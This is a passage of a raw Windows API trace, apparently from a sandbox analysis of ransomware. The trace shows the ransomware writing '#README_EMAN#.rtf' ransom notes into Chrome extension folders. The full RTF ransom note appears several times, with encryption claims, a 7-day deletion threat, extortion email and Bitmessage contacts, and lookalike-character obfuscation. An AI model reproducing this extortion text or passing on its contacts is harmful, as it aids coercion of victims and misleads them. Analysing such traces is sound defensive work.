parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.731] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.732] CloseHandle (hObject=0x2cc) returned 1 [0283.732] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\#readme_eman#.rtf")) returned 0xffffffff [0283.732] GetLastError () returned 0x2 [0283.732] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.733] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.733] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.734] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional 